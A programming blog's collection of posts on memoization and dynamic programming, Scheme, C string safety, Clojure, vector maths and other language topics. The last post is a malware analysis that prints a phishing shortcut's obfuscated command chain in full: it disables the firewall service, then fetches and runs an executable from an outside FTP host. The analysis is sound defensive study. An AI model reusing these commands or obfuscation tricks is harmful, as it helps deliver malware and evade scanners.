Notice something wrong here? All the action happens in the first two steps. Well, semantically all the action happens in the first step; even the memoization is only an optimization. But what an optimization! It's what makes impractical algorithms practical; the remaining steps don't change much. The inversion of control usually contributes nothing, so I'm puzzled that some commenters describe it as the distinctive feature of DP; it looks like an artifact of the imperative past to me. Simplifying the results is valuable when it works (it can change the space complexity), but it only applies to some problems; usually it yields little or nothing. Memoization is the important part; the rest is optional.

Many programmers learn memoization only as a part of this recipe, and therefore call it by the same name. This is why, when people speak of “a dynamic programming algorithm”, they often mean a memoized one — the process has given its name to its main technique. This isn't very confusing; I wouldn't deprecate this common usage on this account. But I do think it's unfortunate that many programmers know the simple concept of memoization only as part of a larger, less coherent bundle.

What if the concepts were taught in a different order? Imagine you had learned memoization of recursive algorithms as an independent concept, before you had ever heard of dynamic programming. When you later meet the rest of the dynamic programming package — the iterativizing, the compact representations of partial results, the analysis of dependencies — what would you think of it? Would you see it as forming a single coherent idea, or as a collection of optimizations to memoized recursion — potentially useful, sure, but not intrinsic to the concept?

It would be the latter, of course: that's how you understand other complex groups of concepts. Take garbage collection, for example. It can fairly be described as just “finding the live objects by tracing the object graph”. There is much more to it, of course — many algorithms, some of which don't look much like tracing, and many optimizations and implementation tricks. But we don't define garbage collection as necessarily including all of these. We define it by its central concept, and treat the others as optional elaborations on that.

We should treat the concepts of dynamic programming the same way. Rather than try to include them all in one package, and refer to them only as a whole, we should let the central idea stand on its own, without reference to its optimizations. When you make a naive recursive algorithm practical by memoizing it, there's no need to describe the result as a “dynamic programming algorithm”; “memoized” already identifies the technique. Why use the vaguer term when you don't have to?

Some people see DP differently: not as a method of implementing algorithms but as a method of discovering them. To them, it's about analyzing dependencies in recursive algorithms, because this can lead to discovering a simpler or more efficient algorithm. The other concepts, like memoization, are optional. (If I understand correctly, from this point of view memoization is simply the general case of saving results blindly, regardless of how they're used — a useful tool, but not conceptually important.) This is a reasonable concept, but it's not the one I'm talking about; I'm more interested in implementing algorithms than discovering them. Maybe there's a divide here between theorists, who care more about discovery, and practitioners, who care more about handy tools. I'm on the practical side, so I see the algorithm discovery method as less interesting, because it's less often useful, than a simple tool for making naive algorithms efficient.

In an attempt to forestall the most obvious misunderstanding: I do not claim “dynamic programming”, as commonly used, refers only to memoization; it often refers to a recipe which happens to include memoization as its main ingredient. But that main ingredient is much more important than the rest of the recipe. We should give our attention not to the garnishes, but to the simple base on which the rest is optimizations.

Why “dynamic programming”?

I've always hated the term “dynamic programming”. It's big and imposing, making a simple concept sound far more intimidating than it should. And it's completely opaque: if you didn't know the term, would you ever guess that it meant memo functions? (Yes, memoization is the right concept; see the followup.)

I always supposed it was historical, and must have made sense, in some context, at some point. Groping for some way to remember the term, I came up with a fable: if you see the cached results as part of the program, then dynamic programming involves augmenting the program at runtime. So I imagined memoization had initially been seen (or even implemented) as a form of self-modifying code, and that explained the term.

But it turns out it never made even that much sense. Richard Bellman, who coined it, explains:

An interesting question is, ‘Where did the name, dynamic programming, come from?’ The 1950s were not good years for mathematical research. We had a very interesting gentleman in Washington named Wilson. He was Secretary of Defense, and he actually had a pathological fear and hatred of the word, research. I’m not using the term lightly; I’m using it precisely. His face would suffuse, he would turn red, and he would get violent if people used the term, research, in his presence. You can imagine how he felt, then, about the term, mathematical. The RAND Corporation was employed by the Air Force, and the Air Force had Wilson as its boss, essentially. Hence, I felt I had to do something to shield Wilson and the Air Force from the fact that I was really doing mathematics inside the RAND Corporation. What title, what name, could I choose? In the first place I was interested in planning, in decision making, in thinking. But planning, is not a good word for various reasons. I decided therefore to use the word, ‘programming.’ I wanted to get across the idea that this was dynamic, this was multistage, this was time-varying—I thought, let’s kill two birds with one stone. Let’s take a word that has an absolutely precise meaning, namely dynamic, in the classical physical sense. It also has a very interesting property as an adjective, and that is it’s impossible to use the word, dynamic, in a pejorative sense. Try thinking of some combination that will possibly give it a pejorative meaning. It’s impossible. Thus, I thought dynamic programming was a good name. It was something not even a Congressman could object to. So I used it as an umbrella for my activities.

“Dynamic programming” never meant anything; it was nothing but a political euphemism. But somehow it became attached to one of the useful concepts Bellman discovered, and to this day, students of computer science struggle to learn that simple idea, because it's burdened with a nonsense name.

Please call it “memoization” instead. And tell your students.

(Via Wikipedia, of all places. It's not usually a good source for CS information, but it's pretty good about linking to historical sources, or at least, as in this case, to an article quoting one.)

(“Dynamic” does have some negatively connoted uses nowadays, in particular in the static type theory community — partly from the perennial flamewar rivalry with dynamic typing, and partly because the main practical purpose of static analysis is to eliminate dynamic uncertainty, so “dynamic” suggests failure.)

Several people have quoted Russell and Norvig: “This cannot be strictly true, because his first paper using the term (Bellman, 1952) appeared before Wilson became Secretary of Defense in 1953.” Perhaps the antipathy to research did not originate with Wilson, or perhaps Bellman initially intended the term to make sense, and only later adopted it as camouflage.

Some things never change

Mike Taylor is having a bad initial experience with Scheme. In particular:

As I continue to work my way through the exercises (using Scheme itself at least for now), I run into a problem: for exercise 2.9.3 I need set-car!, which the purity-fascist maintainers of PLT Scheme removed in release 4.0. No doubt there is a secret incantation to undo this change, but I can’t immediately see what it is.

As he has already figured out, this is because he's using an R5RS book with an R6RS-ish implementation, and R6RS DrScheme's dialect is not a superset of R5RS — not even of the commonly taught parts of R5RS. Such conspicuous backward incompatibilities occasionally strike other languages (Perl, certainly, and hasn't it happened to Python at some point?) but it's more embarrassing in a language like Scheme, which is supposed to be old and elegant and stable.

Correction: as Eli Barzilay points out, it's supposed to be an R6RS book. The use of set-c*r! without the necessary (import (rnrs mutable-pairs)) is probably an oversight, made easy by the fact that it still works in most R6RS implementations. So part of the problem here is that the book is buggy: it uses features that aren't in the language it's teaching. Also, DrScheme's main language isn't R6RS but a different dialect which also happens to lack set-car!.

It's also unfortunate in a language which already has a reputation for being impractical. Mike correctly attributed the problem to “purity-fascist maintainers”, but how many other students, on seeing that Scheme's most popular educational implementation doesn't (by default) support the examples used in popular tutorials, have concluded (or confirmed their prejudice) that Lisp is not useful outside of the ivory tower?

(I don't particularly mind immutable lists, but they're a strange thing to break backward compatibility over.)

Flattening list construction

Most beginning programmers expect lists (and other sequences) to behave something like this:

a = [1, 2, 3]
b = [4]
[a, b] => [1, 2, 3, 4]
[a, 5, b, 6] => [1, 2, 3, 5, 4, 6]

They expect the list construction operator to catenate lists, but not non-lists. As long as lists can't contain other lists (which rarely occurs to beginners), this is a well-behaved operator. Languages which don't allow lists of lists often have it as their default list construction operator: Perl, APL, and R, for example.

Languages which do allow lists of lists generally reject flattening construction on the grounds that it's unpredictable. Which is true — it's easy to write list functions using it that will work perfectly until they encounter nested lists, whereupon they quietly, mysteriously flatten them.

The trouble is, it's a very convenient operator. It's common (especially at the REPL) to construct a list ad hoc, out of some preexisting pieces, and when you do, you generally don't care which elements came prepackaged in lists and which were solitary. That's irrelevant; you just want to assemble them all into a list without worrying about where they came from.

For example, recently I was trying to control the undead menace with Clojure, and wrote this:

(def units (concat (for [y (range 1 20 3)]
                     (spawn zombie 1 y))
                   (list (spawn pixie 10 10)
                         (spawn pixie 15 10))))

I nearly forgot to include that list, because it was irrelevant detail. What I really wanted to write was something like this:

(def units (enlist (for [y (range 1 20 3)]
                     (spawn zombie 1 y))
                   (spawn pixie 10 10)
                   (spawn pixie 15 10)))

In a dynamically typed language, it's easy to define enlist (so I won't bother), but most don't, because it can't be made to work consistently for all inputs. I think this is a loss, because it's so very convenient when it does work.

Lambda: the discontinuity

I like functional programming, especially in points-free style: it allows amazingly terse expression, with minimal attention to plumbing. But there is an annoyance that often trips me up: there's a discontinuity between combinator expressions and lambda-expressions.

Consider the commonplace task of iterating over a list and, say, printing out the elements. There is an obvious points-free way:

(mapc #'print numbers)

More complex functions can be handled with combinators...

(mapc (compose #'print #'round) numbers)

...and partial application:

(mapc (compose (op format t "  ~S~%" _) #'round) numbers)

But for more complicated functions, points-free style gets awkward quickly, especially if you don't have other combinators like s. As soon as we want to use some variable twice, it's usually easier to switch to lambda:

(mapc (lambda (x) (format t "~S (really ~S)~%" (round x) x))
      numbers)

And that switch requires rewriting the whole function in a completely different way.

Having more than one way to write functions is not in itself a problem, of course. The trouble is that I often want to transform between them, when a points-free expression grows to the point where it needs a lambda. At this point I have to stop thinking about what I want the code to do, and instead think about the trivia of combinators and variables. It's only a minor annoyance, but it's a very common one. And it's more common in more points-free code, so it probably discourages good programming style.

Is there an alternative to lambda/combinator calculus that can express simple functions as tersely as combinator style, but without the discontinuity when they grow? In particular, I want to be able to name variables without reorganizing the code that uses them. This is a hard problem and I don't expect to find any good solution, but I'm still looking. Lambda and combinator calculus are wonderful things, but they're not perfect, and even a small improvement in expressiveness of simple functions would be a big deal.

C's safety problem

Tim Jasko wrote (over a year ago; sorry):

This got me thinking about how other languages tend to lend themselves to certain vulnerabilties. We're all aware of buffer overflow exploits; these are due almost entirely to the fact that C/C++ force you to waste time managing memory.

Most buffer overflows are due to C, but this isn't because of memory management, except in the very general sense that C doesn't allocate string space automatically. C's vulnerability to buffer overflows is almost entirely due to a peculiar fault of its standard library: many of its string functions do not operate on its standard string type.

C's standard mutable string type is a null-terminated fixed-size buffer. This isn't a great choice, for well-known reasons, but it isn't a vulnerability in itself, and it is at least easy to implement. But surprisingly, C's standard library doesn't. It has a variety of operations that write to string buffers, but many of them expect infinite buffers, so they're unsafe on ordinary C strings. These include strcpy, strcat, sprintf, *scanf with %s, and gets. Sadly, these functions have short names and are considered canonical, so they're used in far more than the rare cases where they're safe.

Furthermore, of the operations that do operate on null-terminated fixed-size buffers, most break the invariants of the type in error cases. In particular, strncpy, strncat, snprintf, etc. omit the null terminator on overflow, leaving an invalid string in the buffer. The callers of these functions are supposed to check their return values to discover whether the result fits in the buffer (and if not, give up or try again with a bigger one), but as usual, most callers don't check, and in the overflow case they receive an invalid string instead of a merely truncated one. So even switching to the length-aware string operations doesn't eliminate buffer overflow problems. (This may contribute to C programmers' tendency to use the unsafe ones.)

There are only a very few C functions that correctly write strings to buffers, preserving their invariants even on failure. In fact, the only one I can think of is fgets.

As Dan Bernstein put it:

I've mostly given up on the standard C library. Many of its facilities, particularly stdio, seem designed to encourage bugs.

Fortunately this problem is unique to C's standard library. There's no reason other languages at the same level of abstraction, or even other C libraries, need to have unsafe string operations. It's easy to write correct string operations, even in C, even for null-terminated strings in fixed-size buffers — and security-conscious C programmers often do. There's no reason but history for any language, even C, to have language vulnerabilities.

A surprising autoconversion

Autoconversion of types is a handy thing, and easy to miss when you don't have it. This is especially so in languages like C++ that have many static type distinctions, but don't do many of the conversions automatically. C++ has a built-in autoconversion mechanism, but it's too dangerous to use much, and the alternative of manually overloading every operation with type-converting wrappers is too tedious for anything but a few basic types, so in practice C++ is a non-autoconverting language.

That's the standard excuse, anyway. C++ actually does provide quite a lot of autoconversions, but some of them are bizarrely unhelpful. Take the most obvious autoconversion, for example: converting integers to strings. I ran into this one today:

string s;
int n = 40;
s = n;

A naïve (or even not-so-naïve) user might expect this to set s to "40", but it's actually "(". Assigning a single integer to a string is treated as assignment of a single character, not the decimal representation of the integer. But this is only for assignment; the constructor doesn't accept integers at all. I can think of some excuses for this (characters are sometimes (e.g. by getc) represented as ints; string should be consistent with other collections; base 10 is arbitrary; conversions between semantically different types shouldn't happen automatically; STL is supposed to provide a solid foundation, not be easy to use), but user expectation is so strong here that I'm still surprised.

I'm also surprised I've never run into this before. I habitually use printf-like functions for generating strings, but not always, so you'd think I'd encounter this more than once a decade, especially since += has the same surprising overloading. Do I really never generate strings from single integers? Is this most obvious of autoconversions really so rare in practice?

The switch loop as an expressive device

Consider the switch loop. It's a loop which iterates through the branches of a switch statement, so each iteration does something completely different:

for (int step = 0; step < 3; ++step) {
  switch (step) {
    case 0:
      //do one thing
      break;
    case 1:
      //do another thing
      break;
    case 2:
      //do something else
      break;
  }
  //maybe there's a little bit of common code here
}

It looks like blatant stupidity, and sometimes it is. An unreflective coder who hears a problem described in a way that sounds sort of like iteration may implement it as a loop, without considering whether that makes any sense.

Sometimes the same thing happens as an innocent result of maintenance. Maybe the loop did make sense once, before the switch grew to dominate its body, and no one has noticed that it no longer does.

But sometimes the switch loop serves an expressive purpose.

What do you do when a function needs to execute part of itself several times with different parameters? You make a local function, of course. But what do you do in a language like C that doesn't have local functions? Or a language like C++ that has them, but only in the awkward form of local classes?

The switch loop is one solution. It allows its body to be executed repeatedly with different parameters, and it avoids duplicating it or removing it from its local context. Loops are C's only portable way to locally express repeated execution, and the switch loop is a way to use one as the best available approximation to a local function.

It's not a good solution. Even in C, it's generally better to use a separate top-level function, even if it takes a lot of parameters and makes no sense outside the calling context. But to a programmer who is reluctant to create new top-level definitions (a rather common, and annoying, aversion), or who simply overvalues locality of expression, I can imagine the switch loop seeming the best of the bad options.

An Umeshism

Scott Aaronson described Umeshisms: aphorisms of the form “if you never have $problem, you're spending too much effort avoiding $problem”. He asked his readers for more, but despite their computer-scienciness, no one suggested the obvious:

If your programs never have bugs, you're being too careful.

Or, from a language viewpoint:

If your language never has runtime errors, it's rejecting too many correct programs.

There's obviously a mathematical point to this aphorism schema, but it's surprisingly hard to state it explicitly. Try it: you wind up with enough conditions of continuity and monotonicity (and maybe others I missed) to completely obscure the point. That's why we use aphorisms instead.

Belated impressions of Clojure

Clojure is over two years old, and only last week did I finally get round to writing something in it. Some reactions after writing a few hundred lines:

  • Error reporting is often a bane of new languages, but Clojure's is pretty good — usually you get a Java stack trace. However, I did get a number of NullPointerExceptions without stack traces.
  • I often made what must be a standard newbie mistake: using parentheses in place of square brackets. Some forms, like when-first, handle that well:
    user=> (when-first (x nil) 3)
    java.lang.IllegalArgumentException: when-first requires a vector for its
    binding (NO_SOURCE_FILE:0)
    But fn gives a singularly confusing error:
    user=> (fn (x) 2)
    java.lang.RuntimeException: java.lang.IllegalArgumentException: Don't know
    how to create ISeq from: clojure.lang.Symbol (NO_SOURCE_FILE:136)
    This could be easily fixed by checking the type in psig in fn's expander:
    (if (not (vector? params))
      (throw (java.lang.IllegalArgumentException.
              "fn requires a vector for its parameter list")))
  • Accessing nonexistent fields of struct-maps gives nil instead of an exception. This is consistent with other dictionaries, but it means this error isn't detected reliably, even dynamically.
  • doc is the first thing on the cheatsheet, but I didn't notice it until after I'd spent much of a day manually looking things up. :/
  • The documentation for proxy says it “expands to code which creates a instance of a proxy class that implements the named class/interface(s) by calling the supplied fns”, which sounds complicated and potentially inefficient. So I was very suspicious of it until I realized it's just inner classes.
  • Something like half of my total difficulties were about the Java libraries, not Clojure.
  • Java's GUI libraries are not entirely easy to use, but it's still wonderful to be able to take GUI support for granted. I'm used to GUI being possible in theory but not in practice.
  • for, doseq and range did exactly what I wanted, with no mental effort.
  • dosync took some getting used to. ref, deref and alter aren't unfamiliar, but having to announce in advance that you're doing state is a little unnerving. I didn't have any problems with code that might or might not be called in a transaction, but I was afraid I might. I'm not used to keeping track of this.
  • The inability to nest #(... % ...) is annoying. In about 200 nonblank noncomment lines, I used it five times. It would have been seven, but two of those would have been nested (immediately, in both cases) inside others. On the other hand, there were several other 1-argument fns that could have been written with #(... % ...), had I thought of it — which I didn't, because my pet language's equivalent only does partial application.
  • (alter r f x) is equivalent to (alter r #(f % x)). This saves a little typing, but it's such an arbitrary convenience that I found myself worrying about whether it worked with each function's argument order.
  • Clojure structures are dictionaries, but this isn't important; so far I've only used them like ordinary user-defined classes whose accessors happen to have names beginning with colons. It does mean they appear in a strange place in the documentation, though.
  • assoc is obvious in retrospect. I have wanted such an operator for structures, and I'd probably want it for dictionaries too, if I ever used nondestructive dictionaries.
  • Some functions I missed: abs, expt, union and intersection (they exist in clojure.set but not in the default namespace, and they don't work on lists), member? (on values, not keys), for-each (yeah, I know, I'm not supposed to want it), and a function that returns the first element of a list that satisfies a predicate.

Function of the day: scalar resolute

The language of mathematics is old and heavily explored, so its vocabulary tends to align well with what is asked of it. But occasional holes do turn up when parts of it are borrowed into programming languages and used for purposes different from those they were developed for. I ran into one of these twice recently, for unrelated reasons, while writing vector arithmetic code. In both cases, I had vectors a and b, and needed the component of a in the direction of b — the projection of a on b, except that I needed it as a scalar. My vector library provided norm, project, unit and dot, so I had a choice of norm (project a b) or dot a (unit b), neither of which is particularly clear.

A little googling reveals that while this operation isn't commonly taught, it is known to mathematicians, who call it the scalar resolute, by analogy to “vector resolute”, which is another name for the ordinary projection operation. It seems to me that I want it considerably more often than either project or dot, so it makes sense to include it in vector libraries. Unfortunately it has no common notation, and while one could be invented (scalar-project? along?), the operation is obscure enough that its would-be users might not recognize it by any name, because they wouldn't be looking for it.

Many uses of scalar resolute also want the component perpendicular to the base vector, i.e. norm (a - (project a b)), because they're really about converting from one coordinate system to another. A vector library could directly support this with a rotate or rebase function. However, a glance through my code suggests this wouldn't be very useful, because the point of the transformation is to obtain the individual components, so they can be operated on as scalars. Producing another vector as an intermediate step would not greatly help clarity. So I think these are most convenient as separate functions:

along : (vector, vector) → scalar
along v b = norm (project v b)

across : (vector, vector) → scalar
across v b = norm (v - project v b)

Rational arithmetic is a red herring

It's a traditional question: what's 1 / 3?

Depending on the language, the result may be the integer 0, a floating-point approximation 0.33333333333..., or the exact ratio 1/3. Languages supporting the last often tout it as one of their advantages: they give correct results for integer division, unlike those other languages that only give almost-correct ones, or, worse, compute some other function entirely and call it division.

I used to agree with this. Exact arithmetic is a nice feature, to be sure, and I've happily used it in a few toy programs. But as far as I can remember, I've never wanted it in a real program. Somehow, whenever I need real arithmetic for a real problem, some of the input is already approximate, so I don't mind a little more rounding. Rational arithmetic looks nice on a feature checklist, but it rarely makes my life easier.

It's also not as special as it sounds. Ratios are a simple case of symbolic arithmetic: keeping the result as something expression-like, instead of approximating it by a mere number. But division isn't the only operation that's commonly available only in approximate form. We don't expect square roots or trigonometry to be done symbolically; usually we settle for numerical approximations. Why should division be different?

While I'm complaining about rationals, I should mention a common practical problem: most languages with rationals print them as ratios, which can be quite inconvenient for humans to read. It's annoying to use a language's REPL as a calculator, and to discover that you have accidentally gotten an exact result, and must introduce some inexactness into the computation in order to be able to understand the result. (Frink can handle this nicely, by printing both the ratio and decimal forms, although for some reason this no longer works in the convenient online version.) This is a superficial UI problem, and really has nothing to do with rational arithmetic, but if it's not addressed — and it rarely is — it interferes with the utility of the language far more than mere rounding.

An onion of obfuscation

I received a phishing attack in my mail today. I wouldn't ordinarily have paid any attention, especially as it was attached to a message in Chinese, which I can't read without a dictionary and a grammar book (and not well then). But by chance it appeared to come from someone who has previously written to me in Chinese, and it was short enough that she might plausibly have intended me to puzzle it out. So the unintelligible message raised my suspicions only a little, and I looked at the attachment anyway. (Sure enough, the message turned out to be vague platitudes.)

It took a while for me to figure out that it was a phishing attack, not a virus. It was packaged as a Windows .LNK file — a shortcut — which ran a 245-character command beginning with:

%coMSpEc% /C sET s=o GAm &ECHO %V%%S%E0TW%x%^>K>w&eCHO %v%123^>^>K>>w& ...

Sorry about the StUdLyCaPs — it was apparently written like that to make it look less like code. But what does it do? %comspec% is usually cmd.exe, and cmd /c some-command runs some-command. In cmd.exe's language, & separates multiple commands to be run sequentially. So this is a script embedded in a one-line command. Case-folded and reformatted, it's:

set s=o gam
echo %v%%s%e0tw%x%^>k >w
echo %v%123^>^>k >>w
echo %v%123^>^>k >>w
echo %v%get c c.vbs ^>^>k >>w
echo %v%by ^>^>k >>w
echo %i%p%b%s:k >>w
echo %f%art c.vbs >>w
set b= -
set i=ft
set x=.com
set v=echo 
ren w g.bat
set f=st
g.bat

This writes something to w and then executes it. ^ escapes the following character, and > and >> are the same as on Unix, so the contents of w turn out to be:

%v%o game0tw%x% >k
%v%123 >>k
%v%123 >>k
%v%get c c.vbs >>k
%v%by >>k
%i%p%b%s:k
%f%art c.vbs

Substituting in the variables gives:

echo o game0tw.com >k
echo 123 >>k
echo 123 >>k
echo get c c.vbs >>k
echo by >>k
ftp -s:k
start c.vbs

So it's writing another file and executing it, although in this case the interpreter is ftp. k contains:

o game0tw.com
123
123
get c c.vbs
by

The 123s are a username and password, which ftp will prompt for. c.vbs is (as of two hours later) still available; it contains (reformatted):

function o
  for i=1 to UBound(s)
    h=h&chr(s(i)-232)
  next
  Set qq = CreateObject("Wscript.Shell") 
  qq.run h,0
end function
s=array(245,331,341,332,264,279,331,264,342,333,348,264,347,
        348,343,344,264,347,336,329,346,333,332,329,331,331,
        333,347,347,270,333,331,336,343,264,343,264,335,329,
        341,333,280,348,351,278,331,343,341,294,341,278,348,
        352,348,270,333,331,336,343,264,281,282,283,294,294,
        341,278,348,352,348,270,333,331,336,343,264,281,282,
        283,294,294,341,278,348,352,348,270,333,331,336,343,
        341,278,348,352,348,270,333,331,336,343,264,330,353,
        333,294,294,341,278,348,352,348,270,334,348,344,264,
        277,347,290,341,278,348,352,348,270,332,333,340,264,
        341,278,348,352,348,270,333,278,333,352,333,270,329,
        348,348,346,337,330,264,295,278,350,330,347,264,277,
        346,270,332,333,340,264,295,264,295,278,330,329,348,
        264,295,278,350,330,347,264,295,278,333,352,333,270,
        270,347,348,329,346,348,264,336,348,348,344,290,279,
        279,348,351,278,330,337,332,278,353,329,336,343,343,
        278,331,343,341,279)
o

Once the array is converted to a string, h turns out to be another script embedded in a cmd /c one-liner. This time the commands are:

net stop sharedaccess
echo o game0tw.com >m.txt
echo 123 >>m.txt
echo 123 >>m.txt
echo get e e.exe >>m.txt
echo bye >>m.txt
ftp -s:m.txt
del m.txt
e.exe
attrib ?.vbs -r
del ? ?.bat ?.vbs ?.exe
start http://tw.bid.yahoo.com/

Looks familiar, no? Once again it writes a script for ftp and fetches and runs a file. Despite being transferred in text mode, e.exe turns out to be a 52736-byte executable. I won't try to understand it, but I think it's the payload rather than another level of obfuscatory packaging, because it imports a variety of suspicious Win32 functions, including DeviceIoControl, InsertMenuA, and UnregisterClassW. I'm guessing it tries to replace something (part of a browser?) for phishing purposes. There is a suspicious shortage of strings other than the imports, though, which suggests it obfuscates its data internally. (It also calls IsDebuggerPresent, presumably to inconvenience people who are trying to watch it run.)

But never mind the binary. Count the layers of obfuscatory packaging:

  • Embedding a script in a command via cmd /C ... & ... & ... (twice)
  • StUdLyCaPs to escape case-sensitive code detectors
  • Assembling strings out of several pieces
  • Generating a script and then running it (four times)
  • Representing text as an array of numbers
  • Fetching code from elsewhere (twice)
  • Fetching a binary in text mode, so ordinary attempts to download it will get a corrupted version.

That's some impressive depth of defense. I'm tempted to dismiss it as a waste of effort, since none of the layers are much trouble by themselves. But it did get past my virus scanner.